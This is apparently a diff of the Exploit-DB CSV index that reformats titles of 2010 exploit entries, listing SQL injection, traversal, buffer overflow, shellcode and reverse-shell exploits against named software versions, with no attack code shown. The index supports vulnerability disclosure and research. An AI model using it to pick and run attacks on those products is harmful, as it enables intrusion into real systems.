+15048,platforms/windows/remote/15048.txt,"smartermail 7.1.3876 - Directory Traversal Vulnerability",2010-09-19,sqlhacker,windows,remote,0 15049,platforms/php/webapps/15049.txt,"BoutikOne 1.0 - SQL Injection Vulnerability",2010-09-19,BrOx-Dz,php,webapps,0 15050,platforms/php/webapps/15050.txt,"Opencart 1.4.9.1 - Remote File Upload Vulnerability",2010-09-19,Net.Edit0r,php,webapps,0 15054,platforms/linux/dos/15054.rb,"RarCrack 0.2 - Buffer Overflow Proof Of Concept",2010-09-19,The_UnKn@wn,linux,dos,0 15056,platforms/windows/remote/15056.py,"Java CMM readMabCurveData - Stack Overflow",2010-09-20,Abysssec,windows,remote,0 15058,platforms/asp/webapps/15058.html,"VWD-CMS - CSRF Vulnerability",2010-09-20,Abysssec,asp,webapps,0 -15060,platforms/php/webapps/15060.txt,"LightNEasy Cms 3.2.1 - Blind SQL Injection Vulnerability",2010-09-20,Solidmedia,php,webapps,0 -15061,platforms/windows/dos/15061.txt,"microsoft drm technology (msnetobj.dll) activex Multiple Vulnerabilities",2010-09-20,"Asheesh kumar Mani Tripathi",windows,dos,0 +15060,platforms/php/webapps/15060.txt,"LightNEasy CMS 3.2.1 - Blind SQL Injection Vulnerability",2010-09-20,Solidmedia,php,webapps,0 +15061,platforms/windows/dos/15061.txt,"Microsoft drm technology (msnetobj.dll) activex Multiple Vulnerabilities",2010-09-20,"Asheesh kumar Mani Tripathi",windows,dos,0 15062,platforms/linux/dos/15062.txt,"RarCrack 0.2 - ""filename"" init() .bss PoC",2010-09-20,Stoke,linux,dos,0 15063,platforms/windows/shellcode/15063.c,"win32/xp sp3 (Tr) Add Admin Account Shellcode 127 bytes",2010-09-20,ZoRLu,windows,shellcode,0 15064,platforms/php/webapps/15064.txt,"primitive cms 1.0.9 - Multiple Vulnerabilities",2010-09-20,"Stephan Sattler",php,webapps,0 15065,platforms/windows/dos/15065.txt,"Microsoft Excel - WOPT Record Parsing Heap Memory Corruption",2010-09-21,Abysssec,windows,dos,0 15067,platforms/asp/webapps/15067.txt,"Personal.Net Portal - Multiple Vulnerabilities",2010-09-21,Abysssec,asp,webapps,0 -15069,platforms/windows/local/15069.py,"Acoustica Audio Converter Pro 1.1 (build 25) Heap Overflow(.mp3.wav.ogg.wma) PoC",2010-09-21,"Carlos Mario Penagos Hollmann",windows,local,0 +15069,platforms/windows/local/15069.py,"Acoustica Audio Converter Pro 1.1 (build 25) - Heap Overflow (.mp3.wav.ogg.wma) PoC",2010-09-21,"Carlos Mario Penagos Hollmann",windows,local,0 15070,platforms/php/webapps/15070.txt,"ibPhotohost 1.1.2 - SQL Injection",2010-09-21,fred777,php,webapps,0 15071,platforms/windows/remote/15071.txt,"Softek Barcode Reader Toolkit ActiveX 7.1.4.14 (SoftekATL.dll) Buffer Overflow PoC",2010-09-21,LiquidWorm,windows,remote,0 15072,platforms/windows/remote/15072.rb,"Novell iPrint Client ActiveX Control call-back-url Buffer Overflow Exploit (meta)",2010-09-21,Trancer,windows,remote,0 @@ -13100,7 +13100,7 @@ id,file,description,date,author,platform,type,port 15076,platforms/windows/dos/15076.py,"Adobe Shockwave Director tSAC - Chunk Memory Corruption",2010-09-22,Abysssec,windows,dos,0 15078,platforms/asp/webapps/15078.txt,"gausCMS - Multiple Vulnerabilities",2010-09-22,Abysssec,asp,webapps,0 15080,platforms/php/webapps/15080.txt,"Skybluecanvas 1.1-r248 - Cross Site Request Forgery Vulnirability",2010-09-22,Sweet,php,webapps,0 -15081,platforms/windows/local/15081.rb,"MP3 Workstation 9.2.1.1.2 - SEH exploit (MSF)",2010-09-22,Madjix,windows,local,0 +15081,platforms/windows/local/15081.rb,"MP3 Workstation 9.2.1.1.2 - SEH Exploit (MSF)",2010-09-22,Madjix,windows,local,0 15082,platforms/php/webapps/15082.txt,"BSI Hotel Booking System Admin 1.4 & 2.0 - Login Bypass Vulnerability",2010-09-22,K-159,php,webapps,0 15084,platforms/php/webapps/15084.txt,"Joomla TimeTrack Component 1.2.4 - Component Multiple SQL Injection Vulnerabilities",2010-09-22,"Salvatore Fresta",php,webapps,0 15085,platforms/php/webapps/15085.txt,"Joomla Component (com_ezautos) SQL Injection Vulnerability",2010-09-22,Gamoscu,php,webapps,0 @@ -13109,7 +13109,7 @@ id,file,description,date,author,platform,type,port 15090,platforms/php/webapps/15090.txt,"WAnewsletter 2.1.2 - SQL Injection Vulnerability",2010-09-23,BrOx-Dz,php,webapps,0 15091,platforms/php/webapps/15091.txt,"GeekLog 1.3.8 (filemgmt) - SQL Injection Vulnerability",2010-09-23,Gamoscu,php,webapps,0 15092,platforms/php/webapps/15092.txt,"OvBB 0.16a - Multiple Local File Inclusion Vulnerabilities",2010-09-23,cOndemned,php,webapps,0 -15093,platforms/php/webapps/15093.txt,"Collaborative Passwords Manager 1.07 Multiple Local Include Vulnerabilities",2010-09-24,sh00t0ut,php,webapps,0 +15093,platforms/php/webapps/15093.txt,"Collaborative Passwords Manager 1.07 - Multiple Local Include Vulnerabilities",2010-09-24,sh00t0ut,php,webapps,0 15094,platforms/windows/local/15094.py,"Microsoft Excel - OBJ Record Stack Overflow",2010-09-24,Abysssec,windows,local,0 15096,platforms/windows/dos/15096.py,"Microsoft MPEG Layer-3 Audio Decoder Division By Zero",2010-09-24,Abysssec,windows,dos,0 15098,platforms/php/webapps/15098.txt,"FreePBX <= 2.8.0 Recordings Interface Allows Remote Code Execution",2010-09-24,"Trustwave's SpiderLabs",php,webapps,0 @@ -13131,10 +13131,10 @@ id,file,description,date,author,platform,type,port 15124,platforms/asp/webapps/15124.txt,"ndCMS - SQL Injection Vulnerability",2010-09-27,Abysssec,asp,webapps,0 15126,platforms/php/webapps/15126.txt,"Entrans SQL Injection Vulnerablility",2010-09-27,keracker,php,webapps,0 15128,platforms/win32/webapps/15128.txt,"Allpc 2.5 osCommerce SQL/XSS Multiple Vulnerabilities",2010-09-27,**RoAd_KiLlEr**,win32,webapps,80 -15130,platforms/cgi/webapps/15130.sh,"Barracuda Networks Spam & Virus Firewall <= 4.1.1.021 Remote Configuration Retrieval",2010-09-27,ShadowHatesYou,cgi,webapps,0 +15130,platforms/cgi/webapps/15130.sh,"Barracuda Networks Spam & Virus Firewall <= 4.1.1.021 - Remote Configuration Retrieval",2010-09-27,ShadowHatesYou,cgi,webapps,0 15131,platforms/windows/dos/15131.txt,"Fox Audio Player 0.8.0 .m3u Denial of Service Vulnerability",2010-09-27,4n0nym0us,windows,dos,0 -15133,platforms/windows/local/15133.pl,"iworkstation 9.3.2.1.4 - seh exploit",2010-09-27,"sanjeev gupta",windows,local,0 -15134,platforms/windows/local/15134.rb,"Digital Music Pad 8.2.3.3.4 - SEH overflow Metasploit Module",2010-09-27,"Abhishek Lyall",windows,local,0 +15133,platforms/windows/local/15133.pl,"iworkstation 9.3.2.1.4 - seh Exploit",2010-09-27,"sanjeev gupta",windows,local,0 +15134,platforms/windows/local/15134.rb,"Digital Music Pad 8.2.3.3.4 - SEH Overflow Metasploit Module",2010-09-27,"Abhishek Lyall",windows,local,0 15135,platforms/php/webapps/15135.txt,"Car Portal 2.0 - BLIND SQL Injection Vulnerability",2010-09-27,**RoAd_KiLlEr**,php,webapps,0 15136,platforms/windows/shellcode/15136.cpp,"Windows Mobile 6.5 TR Phone Call Shellcode",2010-09-27,"Celil Ünüver",windows,shellcode,0 15139,platforms/asp/webapps/15139.txt,"AtomatiCMS - Upload Arbitrary File Vulnerability",2010-09-28,Abysssec,asp,webapps,0 @@ -13155,7 +13155,7 @@ id,file,description,date,author,platform,type,port 15157,platforms/php/webapps/15157.txt,"je guestbook 1.0 joomla component Multiple Vulnerabilities",2010-09-30,"Salvatore Fresta",php,webapps,0 15158,platforms/windows/dos/15158.py,"Microsoft Unicode Scripts Processor - Remote Code Execution",2010-09-30,Abysssec,windows,dos,0 15160,platforms/asp/webapps/15160.txt,"ASPMass Shopping Cart - Vulnerability File Upload CSRF",2010-09-30,Abysssec,asp,webapps,0 -15162,platforms/php/webapps/15162.rb,"Joomla JE Job Component SQL injection Vulnerability",2010-09-30,"Easy Laster",php,webapps,0 +15162,platforms/php/webapps/15162.rb,"Joomla JE Job Component SQL Injection Vulnerability",2010-09-30,"Easy Laster",php,webapps,0 15163,platforms/php/webapps/15163.rb,"Joomla JE Directory Component SQL Injection Vulnerability",2010-09-30,"Easy Laster",php,webapps,0 15164,platforms/php/webapps/15164.txt,"JomSocial 1.8.8 Shell Upload Vulnerability",2010-09-30,"Jeff Channell",php,webapps,0 15165,platforms/php/webapps/15165.txt,"zen cart 1.3.9f - Multiple Vulnerabilities",2010-10-01,LiquidWorm,php,webapps,0 @@ -13209,7 +13209,7 @@ id,file,description,date,author,platform,type,port 15232,platforms/php/webapps/15232.txt,"OrangeHRM 2.6.0.1 - Local File Inclusion Vulnerability",2010-10-11,ZonTa,php,webapps,0 15233,platforms/php/webapps/15233.txt,"BaconMap 1.0 - SQL Injection Vulnerability",2010-10-11,"John Leitch",php,webapps,0 15234,platforms/php/webapps/15234.txt,"BaconMap 1.0 - Local File Disclosure Vulnerability",2010-10-11,"John Leitch",php,webapps,0 -15235,platforms/windows/remote/15235.html,"AoA Audio Extractor 2.x - ActiveX ROP exploit",2010-10-11,mr_me,windows,remote,0 +15235,platforms/windows/remote/15235.html,"AoA Audio Extractor 2.x - ActiveX ROP Exploit",2010-10-11,mr_me,windows,remote,0 15237,platforms/php/webapps/15237.txt,"AdaptCMS 2.0.1 Beta Release Remote File Inclusion Vulnerability (msf)",2010-10-12,v3n0m,php,webapps,0 15238,platforms/windows/remote/15238.py,"Disk Pulse Server 2.2.34 - Remote Buffer Overflow Exploit",2010-10-12,"xsploited security",windows,remote,0 15239,platforms/php/webapps/15239.html,"WikiWebHelp 0.3.3 - Cross-Site Request Forgery Vulnerability",2010-10-12,Yoyahack,php,webapps,0 @@ -13256,14 +13256,14 @@ id,file,description,date,author,platform,type,port 15292,platforms/windows/remote/15292.rb,"ASP.NET Auto-Decryptor File Download Exploit (MS10-070)",2010-10-20,"Agustin Azubel",windows,remote,0 15293,platforms/linux/dos/15293.txt,"LibSMI smiGetNode Buffer Overflow When Long OID Is Given In Numerical Form",2010-10-20,"Core Security",linux,dos,0 15295,platforms/php/webapps/15295.html,"sNews CMS Multiple XSS Vulnerabilities",2010-10-21,"High-Tech Bridge SA",php,webapps,0 -15296,platforms/windows/remote/15296.txt,"Adobe Shockwave player rcsL chunk memory corruption 0day",2010-10-21,Abysssec,windows,remote,0 +15296,platforms/windows/remote/15296.txt,"Adobe Shockwave Player - rcsL chunk memory corruption (0day)",2010-10-21,Abysssec,windows,remote,0 15297,platforms/windows/dos/15297.txt,"Windows Mobile 6.1 and 6.5 Double Free Denial of Service",2010-10-21,"musashi karak0rsan",windows,dos,0 15298,platforms/multiple/remote/15298.txt,"Sawmill Enterprise < 8.1.7.3 - Multiple Vulnerabilities",2010-10-21,"SEC Consult",multiple,remote,0 15300,platforms/php/webapps/15300.txt,"Squirrelcart PRO 3.0.0 - Blind SQL Injection Vulnerability",2010-10-21,"Salvatore Fresta",php,webapps,0 15301,platforms/windows/dos/15301.pl,"Altova DatabaseSpy 2011 Project File Handling Buffer Overflow Vulnerability",2010-10-21,LiquidWorm,windows,dos,0 15302,platforms/windows/dos/15302.py,"Spider Player 2.4.5 - Denial of Service Vulnerability",2010-10-22,"MOHAMED ABDI",windows,dos,0 15304,platforms/linux/local/15304.txt,"GNU C library dynamic linker LD_AUDIT - Arbitrary DSO Load Vulnerability (Local Root)",2010-10-22,"Tavis Ormandy",linux,local,0 -15305,platforms/windows/dos/15305.pl,"RarmaRadio <= 2.53.1 (.m3u) Denial of Service vulnerability",2010-10-23,anT!-Tr0J4n,windows,dos,0 +15305,platforms/windows/dos/15305.pl,"RarmaRadio <= 2.53.1 (.m3u) Denial of Service Vulnerability",2010-10-23,anT!-Tr0J4n,windows,dos,0 15306,platforms/win32/dos/15306.pl,"AnyDVD <= 6.7.1.0 - Denial of Service",2010-10-23,Havok,win32,dos,0 15307,platforms/windows/dos/15307.py,"HP Data Protector Media Operations 6.11 HTTP Server Remote Integer Overflow DoS",2010-10-23,d0lc3,windows,dos,0 15308,platforms/php/webapps/15308.txt,"Pulse Pro 1.4.3 Persistent XSS Vulnerability",2010-10-24,"Th3 RDX",php,webapps,0 @@ -13277,7 +13277,7 @@ id,file,description,date,author,platform,type,port 15317,platforms/arm/shellcode/15317.S,"ARM ifconfig eth0 and Assign Address",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 15318,platforms/linux/remote/15318.txt,"NitroSecurity ESM 8.4.0a - Remote Code Execution",2010-10-26,"Filip Palian",linux,remote,0 15319,platforms/windows/dos/15319.pl,"Apache 2.2 (Windows) Local Denial of Service",2010-10-26,fb1h2s,windows,dos,0 -15320,platforms/php/webapps/15320.py,"Bigace_2.7.3 CSRF Change Admin Password PoC",2010-10-26,Sweet,php,webapps,0 +15320,platforms/php/webapps/15320.py,"Bigace_2.7.3 - CSRF Change Admin Password PoC",2010-10-26,Sweet,php,webapps,0 15321,platforms/php/webapps/15321.txt,"DBHcms 1.1.4 (dbhcms_user and searchString) - SQL Injection Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0 15322,platforms/php/webapps/15322.txt,"phpLiterAdmin 1.0 RC1 - Authentication Bypass Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0 15323,platforms/php/webapps/15323.txt,"DZCP (deV!Lz Clanportal) 1.5.4 - Local File Inclusion Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0 @@ -13287,12 +13287,12 @@ id,file,description,date,author,platform,type,port 15327,platforms/php/webapps/15327.txt,"Energine CMS SQL Injection Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0 15328,platforms/php/webapps/15328.txt,"BloofoxCMS Registration Plugin SQL Injection Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0 15329,platforms/php/webapps/15329.txt,"Zomplog 3.9 - CSRF Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0 -15330,platforms/php/webapps/15330.txt,"NinkoBB 1.3RC5 XSS Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0 +15330,platforms/php/webapps/15330.txt,"NinkoBB 1.3RC5 - XSS Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0 15331,platforms/php/webapps/15331.txt,"Zomplog 3.9 - Multiple XSS & CSRF Vulnerabilities",2010-10-27,"High-Tech Bridge SA",php,webapps,0 15332,platforms/php/webapps/15332.txt,"BlogBird Platform Multiple XSS Vulnerabilities",2010-10-27,"High-Tech Bridge SA",php,webapps,0 15333,platforms/windows/remote/15333.txt,"MinaliC Webserver 1.0 - Directory Traversal Vulnerability",2010-10-27,"John Leitch",windows,remote,0 15334,platforms/windows/dos/15334.py,"MinaliC Webserver 1.0 - Denial of Service Vulnerability",2010-10-27,"John Leitch",windows,dos,0 -15335,platforms/php/webapps/15335.txt,"alstrasoft e-friends 4.96 Multiple Vulnerabilities",2010-10-27,"Salvatore Fresta",php,webapps,0 +15335,platforms/php/webapps/15335.txt,"alstrasoft e-friends 4.96 - Multiple Vulnerabilities",2010-10-27,"Salvatore Fresta",php,webapps,0 15336,platforms/windows/remote/15336.txt,"MinaliC Webserver 1.0 - Remote Source Disclosure/File Download",2010-10-27,Dr_IDE,windows,remote,0 15337,platforms/windows/remote/15337.py,"DATAC RealWin SCADA 1.06 - Buffer Overflow Exploit",2010-10-27,blake,windows,remote,0 15338,platforms/php/webapps/15338.txt,"ACC IMoveis 4.0 - SQL Injection Vulnerability",2010-10-27,EraGoN,php,webapps,0 @@ -13306,12 +13306,12 @@ id,file,description,date,author,platform,type,port 15347,platforms/windows/remote/15347.py,"XBMC 9.04.1r20672 soap_action_name post upnp sscanf Buffer Overflow",2010-10-28,n00b,windows,remote,0 15348,platforms/php/webapps/15348.txt,"Pub-Me CMS Blind SQL Injection Vulnerability",2010-10-28,H4f,php,webapps,0 15349,platforms/windows/remote/15349.txt,"Home FTP Server 1.11.1.149 - Post-Auth Directory Traversal",2010-10-29,chr1x,windows,remote,0 -15350,platforms/php/webapps/15350.rb,"PHPKit <= 1.6.1 R2 overview.php SQL injection Vulnerability Exploit",2010-10-29,"Easy Laster",php,webapps,0 -15351,platforms/php/webapps/15351.rb,"mygamingladder MGL Combo System <= 7.5 game.php SQL injection Exploit",2010-10-29,"Easy Laster",php,webapps,0 +15350,platforms/php/webapps/15350.rb,"PHPKit <= 1.6.1 R2 overview.php SQL Injection Vulnerability Exploit",2010-10-29,"Easy Laster",php,webapps,0 +15351,platforms/php/webapps/15351.rb,"mygamingladder MGL Combo System <= 7.5 game.php SQL Injection Exploit",2010-10-29,"Easy Laster",php,webapps,0 15352,platforms/windows/remote/15352.html,"Firefox 3.6.8 - 3.6.11 Interleaving document.write and appendChild Exploit (From the Wild)",2010-10-29,Unknown,windows,remote,0 -15353,platforms/php/webapps/15353.txt,"Joomla Component com_jfuploader < 2.12 Remote File Upload",2010-10-30,Setr0nix,php,webapps,0 +15353,platforms/php/webapps/15353.txt,"Joomla Component com_jfuploader < 2.12 - Remote File Upload",2010-10-30,Setr0nix,php,webapps,0 15354,platforms/php/webapps/15354.txt,"Zoopeer 0.1 & 0.2 (fckeditor) Shell Upload Vulnerability",2010-10-30,Net.Edit0r,php,webapps,0 -15355,platforms/php/webapps/15355.txt,"Simpli Easy (AFC Simple) Newsletter <= 4.2 XSS/Information Leakage",2010-10-30,p0deje,php,webapps,0 +15355,platforms/php/webapps/15355.txt,"Simpli Easy (AFC Simple) Newsletter <= 4.2 - XSS/Information Leakage",2010-10-30,p0deje,php,webapps,0 15356,platforms/windows/dos/15356.pl,"yPlay 2.4.5 - Denial of Service Vulnerability",2010-10-30,"MOHAMED ABDI",windows,dos,0 15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 RETR DELE RMD - Remote Directory Traversal Exploit",2010-10-30,"Yakir Wizman",windows,remote,0 15358,platforms/windows/remote/15358.txt,"SmallFTPD 1.0.3 - Remote Directory Traversal Vulnerability",2010-10-31,"Yakir Wizman",windows,remote,0 @@ -13321,10 +13321,10 @@ id,file,description,date,author,platform,type,port 15367,platforms/php/webapps/15367.txt,"Joomla Sponsor Wall Component (com_sponsorwall) SQL Injection Vulnerability",2010-10-31,FL0RiX,php,webapps,0 15368,platforms/windows/remote/15368.php,"Buffy 1.3 - Remote Directory Traversal Exploit",2010-10-31,"Yakir Wizman",windows,remote,0 15369,platforms/php/webapps/15369.php,"Auto CMS <= 1.8 - Remote Code Execution",2010-10-31,"Giuseppe D'Inverno",php,webapps,0 -15370,platforms/php/webapps/15370.txt,"XAMPP <= 1.7.3 multiple vulnerabilites",2010-11-01,TheLeader,php,webapps,0 -15371,platforms/windows/remote/15371.txt,"yaws 1.89 - Directory Traversal vulnerability",2010-11-01,nitr0us,windows,remote,0 -15373,platforms/windows/remote/15373.txt,"mongoose web server 2.11 - Directory Traversal vulnerability",2010-11-01,nitr0us,windows,remote,0 -15376,platforms/windows/local/15376.c,"Trend Micro Titanium Maximum Security 2011 0day Local Kernel Exploit",2010-11-01,"Nikita Tarakanov",windows,local,0 +15370,platforms/php/webapps/15370.txt,"XAMPP <= 1.7.3 - Multiple vulnerabilites",2010-11-01,TheLeader,php,webapps,0 +15371,platforms/windows/remote/15371.txt,"yaws 1.89 - Directory Traversal Vulnerability",2010-11-01,nitr0us,windows,remote,0 +15373,platforms/windows/remote/15373.txt,"mongoose web server 2.11 - Directory Traversal Vulnerability",2010-11-01,nitr0us,windows,remote,0 +15376,platforms/windows/local/15376.c,"Trend Micro Titanium Maximum Security 2011 - Local Kernel Exploit (0day)",2010-11-01,"Nikita Tarakanov",windows,local,0 15378,platforms/windows/dos/15378.py,"Sybase Advantage Data Architect - ""*.SQL"" Format Heap Oveflow",2010-11-01,d0lc3,windows,dos,0 15380,platforms/hardware/dos/15380.txt,"Xerox 4595 Denial of Service Vulnerability",2010-11-01,chap0,hardware,dos,0 15381,platforms/php/webapps/15381.txt,"Collabtive SQL Injection Vulnerability",2010-11-01,"Anatolia Security",php,webapps,0 @@ -13358,16 +13358,16 @@ id,file,description,date,author,platform,type,port 15415,platforms/php/webapps/15415.txt,"MiniBB 2.5 - SQL Injection Vulnerability",2010-11-04,"High-Tech Bridge SA",php,webapps,0 15416,platforms/php/webapps/15416.txt,"JBI CMS SQL Injection Vulnerability",2010-11-04,Cru3l.b0y,php,webapps,0 15417,platforms/windows/local/15417.pl,"GSPlayer 1.83a Win32 Release Buffer Overflow Vulnerability",2010-11-04,moigai,windows,local,0 -15418,platforms/windows/dos/15418.html,"Internet Explorer Memory Corruption 0day Vulnerability",2010-11-04,Unknown,windows,dos,0 +15418,platforms/windows/dos/15418.html,"Internet Explorer Memory - Corruption Vulnerability (0day)",2010-11-04,Unknown,windows,dos,0 15419,platforms/windows/dos/15419.txt,"Acrobat Reader 9.4 - Memory Corruption Vulnerability",2010-11-04,scup,windows,dos,0 -15420,platforms/windows/dos/15420.c,"Avast! Internet Security aswtdi.sys 0day Local DoS PoC",2010-11-04,"Nikita Tarakanov",windows,dos,0 +15420,platforms/windows/dos/15420.c,"Avast! Internet Security - aswtdi.sys Local DoS PoC (0day)",2010-11-04,"Nikita Tarakanov",windows,dos,0 15421,platforms/windows/remote/15421.html,"Internet Explorer 6, 7, 8 - Memory Corruption Exploit (0day)",2010-11-04,ryujin,windows,remote,0 15422,platforms/windows/dos/15422.pl,"Sami HTTP Server 2.0.1 GET Request Denial of Service Exploit",2010-11-05,wingthor,windows,dos,0 15423,platforms/android/remote/15423.html,"Android 2.0-2.1 - Reverse Shell Exploit",2010-11-05,"MJ Keith",android,remote,0 15426,platforms/windows/dos/15426.txt,"Adobe Flash ActionIf Integer Denial of Service Vulnerability",2010-11-05,"Matthew Bergin",windows,dos,0 15427,platforms/windows/remote/15427.txt,"WinTFTP Server Pro 3.1 - Remote Directory Traversal Vulnerability (0day)",2010-11-05,"Yakir Wizman",windows,remote,0 15428,platforms/multiple/dos/15428.rb,"Avidemux <= 2.5.4 - Buffer Overflow Vulnerability",2010-11-05,The_UnKn@wn,multiple,dos,0 -15429,platforms/windows/dos/15429.txt,"FileFuzz Denial of Service vulnerability",2010-11-05,Sweet,windows,dos,0 +15429,platforms/windows/dos/15429.txt,"FileFuzz Denial of Service Vulnerability",2010-11-05,Sweet,windows,dos,0 15430,platforms/php/webapps/15430.txt,"Joomla ccInvoices Component (com_ccinvoices) SQL Injection Vulnerability",2010-11-05,FL0RiX,php,webapps,0 15431,platforms/php/dos/15431.txt,"PHP 5.3.3/5.2.14 ZipArchive::getArchiveComment NULL Pointer Deference",2010-11-05,"Maksymilian Arciemowicz",php,dos,0 15432,platforms/windows/dos/15432.html,"LEADTOOLS 11.5.0.9 - (ltisi11n.ocx) DriverName() Access Violation DoS",2010-11-05,"Matthew Bergin",windows,dos,0 @@ -13383,7 +13383,7 @@ id,file,description,date,author,platform,type,port 15442,platforms/php/webapps/15442.txt,"Zeeways Adserver Multiple Vulnerabilities",2010-11-06,Valentin,php,webapps,0 15443,platforms/php/webapps/15443.txt,"RSform! 1.0.5 (Joomla) Multiple Vulnerabilities",2010-11-06,jdc,php,webapps,0 15444,platforms/windows/dos/15444.zip,"G Data TotalCare 2011 NtOpenKey Race Condition Vulnerability",2010-11-06,"Nikita Tarakanov",windows,dos,0 -15445,platforms/windows/remote/15445.txt,"femitter ftp server 1.04 - Directory Traversal vulnerability",2010-11-06,chr1x,windows,remote,0 +15445,platforms/windows/remote/15445.txt,"femitter ftp server 1.04 - Directory Traversal Vulnerability",2010-11-06,chr1x,windows,remote,0 15447,platforms/php/webapps/15447.txt,"phpCow 2.1 - File Inclusion Vulnerability",2010-11-06,ViRuS_HiMa,php,webapps,0 15448,platforms/asp/webapps/15448.txt,"pilot cart 7.3 - Multiple Vulnerabilities",2010-11-07,Ariko-Security,asp,webapps,0 15449,platforms/linux/remote/15449.pl,"ProFTPD IAC - Remote Root Exploit",2010-11-07,kingcope,linux,remote,0 @@ -13397,10 +13397,10 @@ id,file,description,date,author,platform,type,port 15458,platforms/windows/dos/15458.txt,"PCSX2 0.9.7 beta Binary Denial of Service Vulnerability",2010-11-08,41.w4r10r,windows,dos,0 15459,platforms/php/webapps/15459.txt,"Seo Panel 2.1.0 - Critical File Disclosure",2010-11-08,MaXe,php,webapps,0 15460,platforms/php/webapps/15460.txt,"Joomla Component ProDesk 1.5 - Local File Inclusion Vulnerability",2010-11-08,d3v1l,php,webapps,0 -15461,platforms/windows/local/15461.c,"G Data TotalCare 2011 0day Local Kernel Exploit",2010-11-08,"Nikita Tarakanov",windows,local,0 +15461,platforms/windows/local/15461.c,"G Data TotalCare 2011 - Local Kernel Exploit (0day)",2010-11-08,"Nikita Tarakanov",windows,local,0 15463,platforms/linux/dos/15463.txt,"Novell Groupwise Internet Agent IMAP LIST Command Remote Code Execution",2010-11-09,"Francis Provencher",linux,dos,0 15464,platforms/linux/dos/15464.txt,"Novell Groupwise Internet Agent IMAP LIST LSUB Command Remote Code Execution",2010-11-09,"Francis Provencher",linux,dos,0 -15465,platforms/php/webapps/15465.rb,"Woltlab Burning Board Userlocator 2.5 - SQL injection Exploit",2010-11-09,"Easy Laster",php,webapps,0 +15465,platforms/php/webapps/15465.rb,"Woltlab Burning Board Userlocator 2.5 - SQL Injection Exploit",2010-11-09,"Easy Laster",php,webapps,0 15466,platforms/php/webapps/15466.txt,"Joomla Component JQuarks4s 1.0.0 - Blind SQL Injection Vulnerability",2010-11-09,"Salvatore Fresta",php,webapps,0 15467,platforms/multiple/dos/15467.txt,"Oracle MySQL < 5.1.49 'WITH ROLLUP' Denial of Service Vulnerability",2010-11-09,"Shane Bester",multiple,dos,0 15468,platforms/php/webapps/15468.txt,"Joomla Component (btg_oglas) HTML & XSS Injection Vulnerability",2010-11-09,CoBRa_21,php,webapps,0 @@ -13419,7 +13419,7 @@ id,file,description,date,author,platform,type,port 15486,platforms/php/webapps/15486.txt,"eBlog 1.7 - Multiple SQL Injection Vulnerabilities",2010-11-10,"Salvatore Fresta",php,webapps,0 15488,platforms/php/webapps/15488.txt,"Landesk OS command injection",2010-11-11,"Aureliano Calvo",php,webapps,0 15489,platforms/windows/local/15489.py,"Mp3-Nator 2.0 - Buffer Overflow Exploit (SEH)",2010-11-11,"C4SS!0 G0M3S",windows,local,0 -15490,platforms/php/webapps/15490.txt,"XT:Commerce < 3.04 SP2.1 XSS Vulnerability",2010-11-11,"Philipp Niedziela",php,webapps,0 +15490,platforms/php/webapps/15490.txt,"XT:Commerce < 3.04 SP2.1 - XSS Vulnerability",2010-11-11,"Philipp Niedziela",php,webapps,0 15491,platforms/osx/dos/15491.txt,"Apple Directory Services Memory Corruption",2010-11-11,"Rodrigo Rubira",osx,dos,0 15492,platforms/php/webapps/15492.php,"E-Xoopport 3.1 - eCal display.php (katid) SQL Injection Exploit",2010-11-11,"Vis Intelligendi",php,webapps,0 15493,platforms/windows/dos/15493.py,"Visual MP3 Splitter & Joiner 6.1 (.wav) Buffer Overflow Vulnerability",2010-11-12,anT!-Tr0J4n,windows,dos,0 @@ -13427,7 +13427,7 @@ id,file,description,date,author,platform,type,port 15495,platforms/windows/dos/15495.py,"Power Audio Editor 7.4.3.230 - (.cda) Denial of Service Vulnerability",2010-11-12,anT!-Tr0J4n,windows,dos,0 15496,platforms/php/webapps/15496.txt,"Metinfo 3.0 - Multiple Vulnerabilities",2010-11-12,anT!-Tr0J4n,php,webapps,0 15497,platforms/asp/webapps/15497.txt,"ASPilot Pilot Cart 7.3 newsroom.asp SQL Injection Vulnerability",2010-11-12,Daikin,asp,webapps,0 -15498,platforms/multiple/dos/15498.html,"Mozilla Firefox <= 3.6.12 Remote Denial of Service",2010-11-12,"emgent white_sheep and scox",multiple,dos,0 +15498,platforms/multiple/dos/15498.html,"Mozilla Firefox <= 3.6.12 - Remote Denial of Service",2010-11-12,"emgent white_sheep and scox",multiple,dos,0 15499,platforms/windows/local/15499.py,"Free WMA MP3 Converter 1.1 - Buffer Overflow Exploit (SEH)",2010-11-12,Dr_IDE,windows,local,0 15500,platforms/php/webapps/15500.txt,"Woltlab Burning Board 2.3.4 File Disclosure Vulnerability",2010-11-12,sfx,php,webapps,0 15501,platforms/php/webapps/15501.txt,"Joomla Component com_jsupport Critical XSS Vulnerability",2010-11-12,Valentin,php,webapps,0 @@ -13446,7 +13446,7 @@ id,file,description,date,author,platform,type,port 15516,platforms/php/webapps/15516.txt,"EasyJobPortal Shell Upload Vulnerability",2010-11-13,MeGo,php,webapps,0 15517,platforms/php/webapps/15517.txt,"Webmatic (index.php) SQL Injection Vulnerability",2010-11-13,v3n0m,php,webapps,0 15518,platforms/php/webapps/15518.txt,"Joomla Component ccBoard 1.2-RC Multiple Vulnerabilities",2010-11-13,jdc,php,webapps,0 -15519,platforms/php/webapps/15519.txt,"OneOrZero AIMS 2.6.0 Members Edition - Multiple Vulnerabilities",2010-11-13,Valentin,php,webapps,0 +15519,platforms/php/webapps/15519.txt,"OneOrZero AIms 2.6.0 Members Edition - Multiple Vulnerabilities",2010-11-13,Valentin,php,webapps,0 15524,platforms/php/webapps/15524.txt,"Pre Ads Portal SQL Bypass Vulnerability",2010-11-13,Cru3l.b0y,php,webapps,0 15526,platforms/php/webapps/15526.txt,"Pre Online Tests Generator Pro SQL Injection Vulnerability",2010-11-13,Cru3l.b0y,php,webapps,0 15531,platforms/php/webapps/15531.txt,"BSI Advance Hotel Booking System 1.0 - SQL Injection Vulnerability",2010-11-14,v3n0m,php,webapps,0 @@ -13472,20 +13472,20 @@ id,file,description,date,author,platform,type,port 